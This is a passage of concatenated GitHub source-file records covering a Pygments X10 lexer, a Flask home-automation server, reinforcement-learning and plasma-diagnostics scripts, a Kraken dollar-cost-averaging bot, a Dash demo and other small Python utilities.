card[\"setNumber\"]\n cards_to_convert.append(f)\n elif card_type == \"basic_lands\":\n basic_lands = []\n for card in cards:\n f = {\"name\": \"\", \"setCode\": \"\", \"setNumber\": \"\", \"treatment\": \"\", \"num_of_treatment\": 1, \"num_in_use\": 0}\n if deck[\"deck_in_use\"]:\n f[\"num_in_use\"] = 1\n f[\"name\"] = card[\"name\"]\n f[\"setCode\"] = card[\"setCode\"]\n f[\"treatment\"] = card[\"treatment\"]\n f[\"setNumber\"] = card[\"setNumber\"]\n basic_lands.append(f)\n deduped_lands = dedupe_basic_lands(basic_lands)\n cards_to_convert.extend(deduped_lands)\n\n\n return cards_to_convert","repo_name":"PretzelTheGreat/mtg_collection_manager","sub_path":"src/deck_parser.py","file_name":"deck_parser.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8397914671","text":"import re\n\nfrom pygments.lexer import RegexLexer\nfrom pygments.token import Text, Comment, Operator, Keyword, Name, String, \\\n Number, Punctuation, Error\n\n__all__ = ['X10Lexer']\n\nclass X10Lexer(RegexLexer):\n \"\"\"\n For the X10 language.\n\n .. 
versionadded:: 0.1\n    \"\"\"\n\n    name = 'X10'\n    aliases = ['x10', 'xten']\n    filenames = ['*.x10']\n    mimetypes = ['text/x-x10']\n\n    keywords = (\n        'as', 'assert', 'async', 'at', 'athome', 'ateach', 'atomic',\n        'break', 'case', 'catch', 'class', 'clocked', 'continue',\n        'def', 'default', 'do', 'else', 'final', 'finally', 'finish',\n        'for', 'goto', 'haszero', 'here', 'if', 'import', 'in',\n        'instanceof', 'interface', 'isref', 'new', 'offer',\n        'operator', 'package', 'return', 'struct', 'switch', 'throw',\n        'try', 'type', 'val', 'var', 'when', 'while'\n    )\n\n    types = (\n        'void',  # trailing comma keeps this a one-element tuple, not a plain string\n    )\n\n    values = (\n        'false', 'null', 'self', 'super', 'this', 'true'\n    )\n\n    modifiers = (\n        'abstract', 'extends', 'implements', 'native', 'offers',\n        'private', 'property', 'protected', 'public', 'static',\n        'throws', 'transient'\n    )\n\n    tokens = {\n        'root': [\n            (r'[^\\S\\n]+', Text),\n            (r'//.*?\\n', Comment.Single),\n            (r'/\\*(.|\\n)*?\\*/', Comment.Multiline),\n            (r'\\b(%s)\\b' % '|'.join(keywords), Keyword),\n            (r'\\b(%s)\\b' % '|'.join(types), Keyword.Type),\n            (r'\\b(%s)\\b' % '|'.join(values), Keyword.Constant),\n            (r'\\b(%s)\\b' % '|'.join(modifiers), Keyword.Declaration),\n            (r'\"(\\\\\\\\|\\\\\"|[^\"])*\"', String),\n            (r\"'\\\\.'|'[^\\\\]'|'\\\\u[0-9a-fA-F]{4}'\", String.Char),\n            (r'.', Text)\n        ],\n    }\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/pygments/lexers/x10.py","file_name":"x10.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"}
+{"seq_id":"12126658166","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request, redirect, url_for, session\nfrom flask import jsonify\nfrom business import controlLed, getVideo_IP, startVideo, getSensor_Data\n\napp = Flask(__name__)\napp.secret_key = 'super secret key'\n\n@app.route('/')\ndef login_form():\n\treturn render_template('login.html')\n\n# the form must specify the methods parameter, otherwise the POST request fails\n@app.route('/login', methods=['GET','POST'])\ndef login():\n\tif request.method == 'POST':\n\t\tname = request.form['username']\n\t\tpwd = request.form['password']\n\t\tprint(name)\n\t\tprint(pwd)\n\t\treturn redirect(url_for('reMain'))\n\n@app.route('/reMain')\ndef reMain():\n\treturn render_template('main.html')\n\n@app.route('/control', methods=['GET','POST'])\ndef controlled():\n\tif request.method == 'POST':\n\t\tvalue = request.form['value']\n\t\tdevice = request.form['device']\n\t\tmsg = device + ':' + value\n\t\tprint(msg)\n\t\tcontrolLed(device,value)\n\t\treturn jsonify({'data':'50'})\n\n@app.route('/getSensorData', methods=['GET','POST'])\ndef getSensorData():\n\tif request.method == 'POST':\n\t\tvalue = request.form['value']\n\t\tdevice = request.form['device']\n\t\tmsg = device + ':' + value\n\t\tprint(msg)\n\n\t\tdata = 2020\n\t\tif 'sensor' in session:\n\t\t\tdata = session['sensor']\n\t\telse:\n\t\t\tdata = getSensor_Data(device)\n\t\t\tsession['sensor'] = data\n\t\thumidity = data/100\n\t\ttemperature = data%100\n\t\treturn jsonify({'humidity':humidity, 'temperature':temperature})\n\n@app.route('/getVideoIP', methods=['GET','POST'])\ndef getVideoIP():\n\tif request.method == 'POST':\n\t\tvalue = request.form['value']\n\t\tdevice = request.form['device']\n\t\tmsg = device + ':' + value\n\t\tprint(msg)\n\t\tip = getVideo_IP()\n\t\tstartVideo()\n\t\treturn jsonify({'ip':ip})\n\t\t\n\nif __name__=='__main__':\n\tapp.run(host='0.0.0.0', 
port=80)\n","repo_name":"QianyuLiu1/Raspberry_Pi_based_Home_Automation_System","sub_path":"home-auto-3.0/home-auto.py","file_name":"home-auto.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9401319482","text":"import cv2\nimport numpy as np\n\ndef get_image(path):\n img = cv2.imread(path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\ndef rand_bbox(img_sz, lam):\n H, W = img_sz\n cut_rat = np.sqrt(1. - lam)\n cut_w = np.int(W * cut_rat)\n cut_h = np.int(H * cut_rat)\n\n # uniform\n cx = np.random.randint(W)\n cy = np.random.randint(H)\n\n bbx1 = np.clip(cx - cut_w // 2, 0, W)\n bby1 = np.clip(cy - cut_h // 2, 0, H)\n bbx2 = np.clip(cx + cut_w // 2, 0, W)\n bby2 = np.clip(cy + cut_h // 2, 0, H)\n return bbx1, bby1, bbx2, bby2","repo_name":"edenni/cldc","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9390683378","text":"import gym\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom gym import wrappers\nfrom datetime import datetime\n\nimport q_learning\nfrom q_learning import plot_cost_to_go, FeatureTransformer, Model, plot_running_avg\n\n\nclass SGDRegressor:\n def __init__(self, **kwargs):\n self.w = None\n self.lr = 10e-2\n\n def partial_fit(self, X, Y):\n if self.w is None:\n D = X.shape[1]\n self.w = np.random.randn(D) / np.sqrt(D)\n self.w += self.lr * (Y - X.dot(self.w)).dot(X)\n\n def predict(self, X):\n return X.dot(self.w)\n\n\n# replace SKLearn Regressor\nq_learning.SGDRegressor = SGDRegressor\n\n# calculate everything up to max[Q(s,a)]\n# Ex.\n# R(t) + gamma*R(t+1) + ... 
+ (gamma^(n-1))*R(t+n-1) + (gamma^n)*max[Q(s(t+n), a(t+n))]\n# def calculate_return_before_prediction(rewards, gamma):\n#     ret = 0\n#     for r in reversed(rewards[1:]):\n#         ret += r + gamma*ret\n#     ret += rewards[0]\n#     return ret\n\n# returns a list of states_and_rewards, and the total reward\n\n\ndef play_one(model, eps, gamma, n=5):\n    observation = env.reset()\n    done = False\n    totalreward = 0\n    rewards = []\n    states = []\n    actions = []\n    iters = 0\n    # array of [gamma^0, gamma^1, ..., gamma^(n-1)]\n    multiplier = np.array([gamma] * n)**np.arange(n)\n\n    while not done and iters < 10000:\n        action = model.sample_action(observation, eps)\n\n        states.append(observation)\n        actions.append(action)\n\n        prev_observation = observation\n        observation, reward, done, info = env.step(action)\n\n        rewards.append(reward)\n\n        # update the model\n        if len(rewards) >= n:\n            return_up_to_prediction = multiplier.dot(rewards[-n:])\n            G = return_up_to_prediction + (gamma**n) * np.max(model.predict(observation)[0])\n            model.update(states[-n], actions[-n], G)\n\n        totalreward += reward\n        iters += 1\n\n    # empty the cache\n    # After running the loop above, we have now gone the full number of iters or\n    # the step action returned done=True.\n\n    # For the last n observations of the loop, we do not have a full number n of\n    # iterations to calculate the return G\n\n    # Let's look only at the last few rewards, states, and actions...\n    rewards = rewards[-n + 1:]\n    states = states[-n + 1:]\n    actions = actions[-n + 1:]\n    # unfortunately, new versions of gym cut off at 200 steps even if not hitting goal\n    # need to check if we're really done, in which case all later rewards are 0\n    if observation[0] >= 0.5: # If the task has already been achieved by the nth from the last iteration...\n        while len(rewards) > 0:\n            G = multiplier[:len(rewards)].dot(rewards) # G now is the discounted rewards remaining without a gamma*max_a[Q(s',a')]\n            model.update(states[0], actions[0], G)\n            rewards.pop(0)\n            states.pop(0)\n            actions.pop(0)\n    else:\n        # didn't make the goal\n        while len(rewards) > 0:\n            guess_rewards = rewards + [-1] * (n - len(rewards))\n            G = multiplier.dot(guess_rewards)\n            model.update(states[0], actions[0], G)\n            rewards.pop(0)\n            states.pop(0)\n            actions.pop(0)\n\n    return totalreward\n\n\nif __name__ == '__main__':\n    env = gym.make('MountainCar-v0')\n    ft = FeatureTransformer(env)\n    model = Model(env, ft, \"constant\")\n    gamma = 0.99\n\n    if 'monitor' in sys.argv:\n        filename = os.path.basename(__file__).split('.')[0]\n        monitor_dir = './' + filename + '_' + str(datetime.now())\n        env = wrappers.Monitor(env, monitor_dir)\n\n    N = 300\n    totalrewards = np.empty(N)\n    costs = np.empty(N)\n    for n in range(N):\n        eps = 0.1 * (0.97**n)\n        totalreward = play_one(model, eps, gamma)\n        totalrewards[n] = totalreward\n        print(\"episode:\", n, \"total reward:\", totalreward)\n    print(\"avg reward for last 100 episodes:\", totalrewards[-100:].mean())\n    print(\"total steps:\", -totalrewards.sum())\n\n    plt.plot(totalrewards)\n    plt.title(\"Rewards\")\n    plt.show()\n\n    plot_running_avg(totalrewards)\n\n    # plot optimal state-value function\n    plot_cost_to_go(env, model)\n","repo_name":"missing-semicolon/udemy-deep-reinforcement-learning-class","sub_path":"mountaincar/n_step.py","file_name":"n_step.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"35319300013","text":"import json\n\ndef get_txt_slowADC_ch(sht_num, ch_num): # returns a list with the chosen channel of every polychromator from the slow ADC txt files\n    all_ch = []\n    times = []\n\n    for ip in range(3):\n        data = []\n        with open('D:\\Ioffe\\slowADC\\calculations\\sht%d\\\\192.168.10.5%d.txt' % (sht_num, ip), 'r') as file:\n            for line in file:\n                data.append([float(x) for x in line.split()])\n\n        for poly_num in range(3):\n            ch1 = []\n            for i in range(len(data)):\n                ch1.append(data[i][1+ch_num + poly_num * 5])\n\n            all_ch.append(ch1)\n\n    for j in range(len(data)):\n        times.append(data[j][0] * 0.002)\n\n    return all_ch,times\n\ndef get_csv_TSdata(sht_num): # csv\n    radius = []\n    time = []\n    concentration_TS = []\n\n    with open('D:\\Ioffe\\slowADC\\calculations\\sht%d\\%d_n(R).csv' % (sht_num, sht_num), 'r') as file:\n        lines = file.readlines()\n        for i in range(2, len(lines)):\n            temp = lines[i].split(',')\n            radius.append(float(temp[0]))\n            conc = []\n            for j in range(1, int(len(temp) / 2)):\n                try:\n                    conc.append(float(temp[j * 2 - 1]))\n                except ValueError:\n                    conc.append(0)\n            concentration_TS.append(conc)\n\n    with open('D:\\Ioffe\\slowADC\\calculations\\sht%d\\%d_n(t).csv' % (sht_num, sht_num), 'r') as file:\n        lines = file.readlines()\n        for i in range(2, len(lines)):\n            temp = lines[i].split(',')\n            time.append(float(temp[0]))\n        print(len(time))\n\ndef get_from_json_TSdata(sht_num):\n    with open('D:\\Ioffe\\slowADC\\calculations\\sht%d\\%d.json' % (sht_num, sht_num), 'r') as file:\n        TS_data_file = json.load(file)\n\n    times = []\n    index_TS = []\n    temperature_TS = []\n    concentration_TS = []\n\n    for i in range(1, len(TS_data_file['events'])):\n        if 'timestamp' in TS_data_file['events'][i] \\\n                and TS_data_file['events'][i]['error'] is None \\\n                and TS_data_file['events'][i]['T_e'][0]['error'] is None \\\n                and TS_data_file['events'][i]['T_e'][1]['error'] is None \\\n                and TS_data_file['events'][i]['T_e'][2]['error'] is None \\\n                and TS_data_file['events'][i]['T_e'][3]['error'] is None \\\n                and TS_data_file['events'][i]['T_e'][5]['error'] is None \\\n                and TS_data_file['events'][i]['T_e'][4]['error'] is None \\\n                and TS_data_file['events'][i]['T_e'][9]['error'] is None \\\n                and TS_data_file['events'][i]['T_e'][6]['error'] is None \\\n                and TS_data_file['events'][i]['T_e'][7]['error'] is None :\n            index_TS.append(i)\n            times.append(float(TS_data_file['events'][i]['timestamp']))\n\n    for j in range(len(TS_data_file['events'][1]['T_e'])):\n        temp_temp = []\n        temp_conc = []\n        print()\n        for ind in index_TS:\n            temp_temp.append(TS_data_file['events'][ind]['T_e'][j]['T'])\n            temp_conc.append(TS_data_file['events'][ind]['T_e'][j]['n'])\n        temperature_TS.append(temp_temp)\n        concentration_TS.append(temp_conc)\n\n    return temperature_TS,concentration_TS,times\n\ndef get_from_json_ADCdata_ch(sht_num,ch_num):\n\n    ADC_num = 4\n    adc_time = []\n    poly_ch = []\n    with open('D:\\Ioffe\\slowADC\\calculations\\sht%d\\\\192.168.10.50.json' % (sht_num), 'r') as file:\n\n        ADC_data_file = json.load(file)\n        for i in range(1, len(ADC_data_file)):\n            adc_time.append(ADC_data_file[i]['time'])\n\n    #for ip in range(4):\n    for ip in range(ADC_num):\n        try:\n            with open('D:\\Ioffe\\slowADC\\calculations\\sht%d\\\\192.168.10.5%d.json' % (sht_num, ip), 'r') as file:\n                ADC_data_file = json.load(file)\n                for j in range(3):\n                    ch = []\n                    for i in range(1, len(ADC_data_file)):\n                        ch.append(float(ADC_data_file[i]['ch'][j*5 + ch_num]))\n                    poly_ch.append(ch)\n        except FileNotFoundError:\n            print('ADC file not found')\n            for j in range(3):\n                ch = []\n                for i in range(1, len(ADC_data_file)):\n                    ch.append(1e-4)\n                poly_ch.append(ch)\n    return adc_time, 
poly_ch\n\n\n\n\n","repo_name":"Ermachok/Zeff_algorithm","sub_path":"get_Data.py","file_name":"get_Data.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21151446604","text":"def min_flips(s, ind, prev, solutions):\n if ind == len(s):\n return 0\n\n if solutions[ind][prev] >= 0:\n return solutions[ind][prev]\n\n cur = int(s[ind])\n\n if prev == 0:\n # flip or not flip is fine!\n ret = min(\n min_flips(s, ind + 1, cur, solutions),\n 1 + min_flips(s, ind + 1, 1 - cur, solutions)\n )\n elif not cur: # must flip\n ret = 1 + min_flips(s, ind + 1, 1, solutions)\n else: # must not flip\n ret = min_flips(s, ind + 1, 1, solutions)\n\n solutions[ind][prev] = ret\n return ret\n\n\nclass Solution:\n def minFlipsMonoIncr(self, s: str) -> int:\n # Time and Space Complexity: O(N)\n\n solutions = [[-1 for _ in range(2)] for _ in range(len(s))]\n return min_flips(s, 0, 0, solutions)\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/926. Flip String to Monotone Increasing/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"20000871802","text":"#!/usr/bin/env python\nimport argparse\nimport logging\nimport csv\nimport os\n\nimport humans\n\nargparser = argparse.ArgumentParser(\n description=\"Run human detection on a list of images and dump csv to outcsv\")\nargparser.add_argument(\"outcsv\", help=\"output csv file\")\nargparser.add_argument(\"image_files\", nargs=\"*\", help=\"list of frames\")\n\nHEADERS = \"filename confidence ymin xmin ymax xmax\".split(\" \")\n\n\ndef main(args):\n with open(args.outcsv, \"w\") as output:\n writer = csv.writer(output)\n writer.writerow(HEADERS)\n writer.writerows(person_generator(args.image_files))\n\n\ndef person_generator(image_files):\n for filename in image_files:\n people = humans.get_people(filename, session)\n for person in people:\n yield (os.path.basename(filename), person[\"score\"], *person[\"box\"])\n\n\nif __name__ == \"__main__\":\n logging.debug(\"Starting App\")\n with humans.detection_graph.as_default():\n with humans.tf.Session(graph=humans.detection_graph) as session:\n main(argparser.parse_args())\n","repo_name":"KaliberLabs/models","sub_path":"app/detect_humans.py","file_name":"detect_humans.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"12443712234","text":"numero = 10\nsegundoNumero = 10\nPrimerArreglo = [1, 2, 3]\nSegundoArreglo = [1, 2, 3]\n\nif numero > 9:\n print(\"1\")\n\nif PrimerArreglo[1] != 10:\n print(\"2\")\n\nif len(SegundoArreglo) == 3:\n print(\"3\")\n\nif len(PrimerArreglo) + len(PrimerArreglo) == 6:\n print(\"4\")\n\nif PrimerArreglo[0] and SegundoArreglo[0] == 1:\n print(\"5\")\n\nif segundoNumero == 10:\n\tprint(not False)\n","repo_name":"hocht/Python","sub_path":"9- Condiciones.py","file_name":"9- Condiciones.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72880041708","text":"\"\"\"Dollar Cost Averaging module.\"\"\"\nimport logging\nfrom datetime import datetime, timedelta\nfrom typing import Optional\n\nfrom krakenapi import KrakenApi\n\nfrom .order import Order\nfrom .pair import Pair\nfrom .utils import (\n current_utc_datetime,\n current_utc_day_datetime,\n 
datetime_as_utc_unix,\n utc_unix_time_datetime,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass DCA:\n \"\"\"\n Dollar Cost Averaging encapsulation.\n \"\"\"\n\n ka: KrakenApi\n delay: int\n pair: Pair\n amount: float\n orders_filepath: str\n limit_factor: float\n max_price: float\n ignore_differing_orders: bool\n\n def __init__(\n self,\n ka: KrakenApi,\n delay: int,\n pair: Pair,\n amount: float,\n limit_factor: float = 1,\n max_price: float = -1,\n ignore_differing_orders: bool = False,\n orders_filepath: str = \"orders.csv\",\n ) -> None:\n \"\"\"\n Initialize the DCA object.\n\n :param ka: KrakenApi object.\n :param delay: DCA days delay between buy orders.\n :param pair: Pair to dollar cost average as string.\n :param amount: Amount to dollar cost average as float.\n :param limit_factor: Price limit factor as float.\n :param max_price: Maximum price as float.\n :param ignore_differing_orders: Other open orders or orders in\n the history are ignored if they\n have an amount that differs more\n than 1% from this DCA's amount.\n :param orders_filepath: Orders save file path as String.\n \"\"\"\n self.ka = ka\n self.delay = delay\n self.pair = pair\n self.amount = float(amount)\n self.limit_factor = float(limit_factor)\n self.max_price = float(max_price)\n self.ignore_differing_orders = ignore_differing_orders\n self.orders_filepath = orders_filepath\n\n def __str__(self) -> str:\n desc: str = (\n f\"Pair {self.pair.name}: delay: {self.delay}, \"\n f\"amount: {self.amount}\"\n )\n if self.limit_factor != 1:\n desc += f\", limit_factor: {self.limit_factor}\"\n if self.max_price != -1:\n desc += f\", max_price: {self.max_price}\"\n return desc\n\n def handle_dca_logic(self) -> None:\n \"\"\"\n Handle DCA logic.\n\n :return: None\n \"\"\"\n # Check current system time.\n current_date = self.get_system_time()\n # Check Kraken account balance.\n self.check_account_balance()\n # Check if didn't already DCA today\n if self.count_pair_daily_orders() != 0:\n logger.warning(\n f\"No DCA for {self.pair.name}: Already placed an order \"\n f\"today.\"\n )\n return\n logger.info(\"Didn't DCA already today.\")\n # Get current pair ask price.\n pair_ask_price = self.pair.get_pair_ask_price(self.ka, self.pair.name)\n logger.info(f\"Current {self.pair.name} ask price: {pair_ask_price}.\")\n # Get limit price based on limit_factor\n limit_price = self.get_limit_price(\n pair_ask_price, self.pair.pair_decimals\n )\n # Reject DCA if limit_price greater than max_price\n if self.max_price != -1 and limit_price > self.max_price:\n logger.info(\n f\"No DCA for {self.pair.name}: Limit price ({limit_price}) \"\n f\"greater than maximum price ({self.max_price}).\"\n )\n return\n # Create the Order object.\n order = Order.buy_limit_order(\n current_date,\n self.pair.name,\n self.amount,\n limit_price,\n self.pair.lot_decimals,\n self.pair.quote_decimals,\n )\n # Send buy order to Kraken API and print information.\n self.send_buy_limit_order(order)\n # Save order information to CSV file.\n order.save_order_csv(self.orders_filepath)\n logger.info(\"Order information saved to CSV.\")\n\n def get_limit_price(\n self, pair_ask_price: float, pair_decimals: int\n ) -> float:\n \"\"\"\n Calculates wanted limit price from current ask price and limit_factor.\n\n :param pair_ask_price: Pair ask price to adjust limit price from.\n :param pair_decimals: Pair maximum number of decimals for price.\n :return: The limit price\n \"\"\"\n if round(self.limit_factor, 5) == 1.0:\n limit_price = pair_ask_price\n else:\n limit_price 
= round(\n pair_ask_price * self.limit_factor, pair_decimals\n )\n logger.info(\n f\"Factor adjusted limit price ({self.limit_factor:.4f})\"\n f\": {limit_price}.\"\n )\n return limit_price\n\n def get_system_time(self) -> datetime:\n \"\"\"\n Compare system and Kraken time.\n Raise an error if too much difference (> 2sc).\n\n :return: datetime object of current system time\n \"\"\"\n kraken_time: int = self.ka.get_time()\n kraken_date: datetime = utc_unix_time_datetime(kraken_time)\n current_date: datetime = current_utc_datetime()\n logger.info(f\"It's {kraken_date} on Kraken, {current_date} on system.\")\n lag_in_seconds: float = (current_date - kraken_date).seconds\n if lag_in_seconds > 2:\n raise OSError(\n \"Too much lag -> Check your internet connection speed \"\n \"or synchronize your system time.\"\n )\n return current_date\n\n def check_account_balance(self) -> None:\n \"\"\"\n Check account trade balance, pair base and pair quote balances.\n Raise an error if quote pair balance\n is too low to DCA specified amount.\n\n :return: None\n \"\"\"\n trade_balance = self.ka.get_trade_balance().get(\"eb\")\n logger.info(f\"Current trade balance: {trade_balance} ZUSD.\")\n balance = self.ka.get_balance()\n try:\n pair_base_balance = float(balance.get(self.pair.base))\n # No pair base balance on Kraken account.\n except TypeError:\n pair_base_balance = 0\n try:\n pair_quote_balance = float(balance.get(self.pair.quote))\n # No pair quote balance on Kraken account.\n except TypeError:\n pair_quote_balance = 0\n logger.info(\n f\"Pair balances: {pair_quote_balance} {self.pair.quote}, \"\n f\"{pair_base_balance} {self.pair.base}.\"\n )\n if pair_quote_balance < self.amount:\n raise ValueError(\n f\"Insufficient funds to buy {self.amount} \"\n f\"{self.pair.quote} of {self.pair.base}\"\n )\n\n def count_pair_daily_orders(self) -> int:\n \"\"\"\n Count current day open and closed orders for the DCA pair.\n\n :return: Count of daily orders for the dollar cost averaged pair.\n \"\"\"\n filter_amount = self.amount if self.ignore_differing_orders else None\n # Get current open orders.\n open_orders = self.ka.get_open_orders()\n daily_open_orders = len(\n self.extract_pair_orders(\n open_orders, self.pair.name, self.pair.alt_name, filter_amount\n )\n )\n\n # Get daily closed orders.\n start_day_datetime = current_utc_day_datetime() - timedelta(\n days=self.delay - 1\n )\n start_day_unix = datetime_as_utc_unix(start_day_datetime)\n closed_orders = self.ka.get_closed_orders(\n {\"start\": start_day_unix, \"closetime\": \"open\"}\n )\n daily_closed_orders = len(\n self.extract_pair_orders(\n closed_orders,\n self.pair.name,\n self.pair.alt_name,\n filter_amount,\n )\n )\n # Sum the count of closed and daily open orders for the DCA pair.\n pair_daily_orders = daily_closed_orders + daily_open_orders\n return pair_daily_orders\n\n @staticmethod\n def extract_pair_orders(\n orders: dict,\n pair: str,\n pair_alt_name: str,\n filter_amount: Optional[float] = None,\n ) -> dict:\n \"\"\"\n Filter orders passed as dictionary on specific\n pair and return the nested dictionary.\n\n :param orders: Orders as dictionary.\n :param pair: Specific pair to filter on.\n :param pair_alt_name: Specific pair alternative name to filter on.\n :param filter_amount: Set to an order amount if any other amounts\n should be disregarded.\n :return: Filtered orders dictionary on specific pair.\n \"\"\"\n pair_orders = {\n order_id: order_infos\n for order_id, order_infos in orders.items()\n if 
\n        if filter_amount is not None:\n            # Disregard any orders that have a differing amount\n            pair_orders = DCA.filter_ignored_orders(pair_orders, filter_amount)\n        return pair_orders\n\n    @staticmethod\n    def filter_ignored_orders(pair_orders: dict, amount: float) -> dict:\n        \"\"\"\n        Removes any order from the pair_orders dict whose amount\n        (volume * price) differs by more than 1% from the given amount.\n\n        :param pair_orders: Dict of orders of a currency pair.\n        :param amount: Amount of interest that is kept in the result (+-1%)\n        :return: Filtered dictionary\n        \"\"\"\n\n        def is_similar_amount(order_info):\n            try:\n                price = float(order_info.get(\"descr\").get(\"price\"))\n                order_amount = float(order_info.get(\"vol\")) * price\n            except (ValueError, TypeError, KeyError) as e:\n                logger.info(\n                    f\"Cannot figure out order amount of {order_info}: {e}\"\n                )\n                return True # don't skip in order to avoid repeating orders.\n            include_order = amount * 0.99 < order_amount < amount * 1.01\n            if not include_order:\n                logger.info(\n                    f\"Ignoring an existing/closed order of {order_amount}\"\n                )\n            return include_order\n\n        return {k: v for k, v in pair_orders.items() if is_similar_amount(v)}\n\n    def send_buy_limit_order(self, order: Order) -> None:\n        \"\"\"\n        Send a limit order for the specified dca pair and amount to Kraken.\n\n        :return: None.\n        \"\"\"\n        if order.volume < self.pair.order_min:\n            raise ValueError(\n                f\"Too low volume to buy {self.pair.base}: \"\n                f\"current {order.volume}, \"\n                f\"minimum {self.pair.order_min}.\"\n            )\n        logger.info(\n            f\"Create a {order.price}{self.pair.quote} buy limit order of \"\n            f\"{order.volume}{self.pair.base} at \"\n            f\"{order.pair_price}{self.pair.quote}.\"\n        )\n        logger.info(\n            f\"Fee expected: {order.fee}{self.pair.quote} (0.26% taker fee).\"\n        )\n        logger.info(\n            f\"Total price expected: {order.volume}{self.pair.base} for \"\n            f\"{order.total_price}{self.pair.quote}.\"\n        )\n        order.send_order(self.ka)\n        logger.info(\"Order successfully created.\")\n        logger.info(f\"TXID: {order.txid}\")\n        logger.info(f\"Description: {order.description}\")\n","repo_name":"adocquin/kraken-dca","sub_path":"krakendca/dca.py","file_name":"dca.py","file_ext":"py","file_size_in_byte":11516,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"37"} +{"seq_id":"22240716377","text":"import pandas as pd\nimport plotly.graph_objs as go\nimport dash\nimport dash_core_components as dcc # interactive components\nimport dash_html_components as html # components rendered to HTML\nfrom dash.dependencies import Input, Output # callbacks\nfrom jupyter_plotly_dash import JupyterDash # Dash inside Jupyter; see part 2 of this series (Installation) if in doubt\n\n\napp = JupyterDash('Chained Callbacks')\nall_options = {\n    '北京': ['东城区', '西城区', '朝阳区'],\n    '上海': ['黄浦区', '静安区', '普陀区']\n}\n\napp.layout = html.Div([\n    dcc.RadioItems(\n        id = 'countries-dropdown',\n        options = [{'label': k, 'value': k} for k in all_options.keys()],\n        value = '北京'),\n    html.Hr(),\n    dcc.RadioItems(id = 'cities-dropdown'),\n    html.Hr(),\n    html.Div(id = 'display-selected-values')\n])\n\n@app.callback(\n    Output('cities-dropdown', 'options'),\n    [Input('countries-dropdown', 'value')])\ndef set_cities_options(select_country):\n    return [{'label': i, 'value': i} for i in all_options[select_country]]\n\n@app.callback(\n    Output('cities-dropdown', 'value'),\n    [Input('cities-dropdown', 'options')])\ndef set_cities_value(available_options):\n    return available_options[0]['value']
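\n\n# Chaining note: selecting a country re-populates the city options via\n# set_cities_options above, and that options change then triggers\n# set_cities_value, which snaps the selected city back to the first option.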
\n\n@app.callback(\n    Output('display-selected-values', 'children'),\n    [Input('countries-dropdown', 'value'),\n     Input('cities-dropdown', 'value')])\ndef set_display_children(select_country, select_city):\n    return f\"{select_city} is a district of {select_country}.\"\n\napp","repo_name":"zhoujia0219/code_practise","sub_path":"chained mode callback.py","file_name":"chained mode callback.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7154663760","text":"import csv\nfrom contextlib import closing\n\nimport requests\nfrom ..debug import debug\n\nclass BytesDecoder:\n    def __init__(self, stream):\n        self.stream = stream\n\n    def __iter__(self):\n        for line in self.stream:\n            line = line.decode()\n            # debug(\"Processing {}\", line)\n            yield line\n\nclass Spreadsheet:\n    def __init__(self, url):\n        self.url = url\n        self.response = None\n        self.data = None\n\n    def download(self):\n        with closing(requests.get(self.url, stream=True)) as resp:\n            if not resp.ok:\n                debug(\"Original URL: {}\", self.url)\n                debug(\"Spreadsheets response: {}:\\n{}\", resp, resp.text)\n                raise AssertionError(\n                    f\"Response from Google Spreadsheets ({resp.request.url!r}) is not OK.\"\n                )\n            self.response = resp\n            self.process()\n\n    def process(self):\n        # why a list comprehension instead of a plain list()?\n        # because list() calls len() for some reason,\n        # which calls load_all again, and we end up in recursion\n        self.data = [x for x in self]\n\n    def __iter__(self):\n        if not self.response:\n            self.download()\n        stream = BytesDecoder(self.response.raw)\n        reader = csv.reader(stream)\n        try:\n            next(reader) # skip the header row\n        except StopIteration: # oh well...\n            pass\n        yield from reader\n\n    def __getitem__(self, num):\n        if self.data is None:\n            self.download()\n        return self.data[num]\n\n    def __len__(self):\n        if self.data is None:\n            self.download()\n        return len(self.data)\n","repo_name":"Close-Encounters-Corps/EDMC-Triumvirate","sub_path":"modules/lib/spreadsheet.py","file_name":"spreadsheet.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"ru","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"34328037694","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\"\"\"\r\n==============\r\nWisteria\r\n==============\r\nAlgorithm used:\r\n    Take a number n (say 13)\r\n    Find the product of non-zero digits in n (1*3 = 3)\r\n    Subtract the obtained number from the starting number n (13 - 3 = 10)\r\n    Repeat the steps for a large list of positive numbers\r\nFor example, for 25\r\n    product_of_digits(25) = 2*5 = 10\r\n    25 - 10 = 15 (final result for number 25)\r\nFor example, for 10125\r\n    product_of_digits(10125) = 1*1*2*5 = 10 (only non zero numbers)\r\n    10125 - 